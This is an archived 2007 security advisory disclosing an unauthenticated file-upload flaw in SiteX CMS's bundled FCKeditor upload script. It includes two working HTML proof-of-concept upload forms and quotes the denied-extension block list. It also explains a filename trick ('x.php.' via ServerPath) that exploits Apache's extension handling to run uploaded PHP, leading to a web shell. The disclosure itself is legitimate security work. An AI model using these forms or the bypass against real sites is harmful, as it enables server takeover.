Hosting Provided By

[waraxe-2007-SA#057] - Unauthorized File Upload in SiteX CMS

From: <come2waraxe(at)yahoo.com>
Date: Thu Sep 27 2007 - 11:24:30 EDT

Author: Janek Vind "waraxe"
Date: 27. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-57.html

Target software description:

http://sitex.bjsintay.com/

SiteX is a versitile web tool that will enable you to start your own dynamic website in under 5 minutes. Driven by PHP and MySQL, SiteX consists of components common to most personal and professional websites.

Vulnerabilities: file upload possibilities

SiteX CMS contains third-party scripts from FCKeditor. One of them is: "includes/fck/editor/filemanager/upload/php/upload.php". This particular script does not have any checks against user validity and anyone can try to upload files to SiteX-powered website.

Do you need help?

Here is proof-of-concept file for testing:

------------>[proof-of-concept]<-----------
<html>
<body>
<center>
<form action="http://localhost/sitex.0.7.3.beta/includes/fck/editor/
filemanager/upload/php/upload.php?ServerPath=/sitex.0.7.3.beta/" enctype="multipart/form-data" method="post">
<input type="file" name="NewFile" size="140">
<input type="submit" value="Test">
</center>
</body>
</html>

------------>[/proof-of-concept]<-----------

Parameter "ServerPath" must be changed as needed. Now, by using this PoC upload file we can upload to victim server any files, except with some predefined (dangerous) extensions.

$Config['DeniedExtensions']['File'] = array('php','php2','php3',
'php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm',
'cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi') ;

But we really want to upload php scripts to victim webserver ... Well, let's assume, that we have php file "test.waraxe". As we see, file extension is "waraxe" :)
Now there is another PoC testfile:

------------>[proof-of-concept]<-----------
<html>
<body>
<center>
<form action="http://localhost/sitex.0.7.3.beta/includes/fck/editor/
filemanager/upload/php/upload.php?ServerPath=/sitex.0.7.3.beta/x.php." enctype="multipart/form-data" method="post">
<input type="file" name="NewFile" size="140">
<input type="submit" value="Test">
</center>
</body>
</html>

------------>[/proof-of-concept]<-----------

And when we use this upload form, then we will have file named "x.php.test.waraxe" in target webserver. Does anyone recall "RAR exploit"? Google for "RAR exploit coppermine" and find out, that Apache webserver has interesting feature: if we request file with unknown extension (".waraxe") and if filename contains ".php.", then Apache will try to handle it as php file :) So that we can now upload to webserver any php files and get php scripting level access to target server. Next step can be uploading php shell and escalating attack.

//-----> See ya soon and have a nice day ;) <-----//

Greetings:

Do you need more help?

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb and all other people who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!

Contact:

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

Shameless advertise:

Biology books - http://biology.oldreadings.com/ Sevice Manuals - http://service-manuals.waraxe.us/

[ EOF ] ------------------------------------

Received on Thu Sep 27 12:56:25 2007

This message: [ Message body ]
Next message: rocheml(at)httrack.com: "Re: Re: Re: Re: Confirmed: Windows Explorer bad PNG file preview integer overflow handling"
Previous message: none(at)none.com: "Re: Re: Re: Confirmed: Windows Explorer bad PNG file preview integer overflow handling"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:18:12 EDT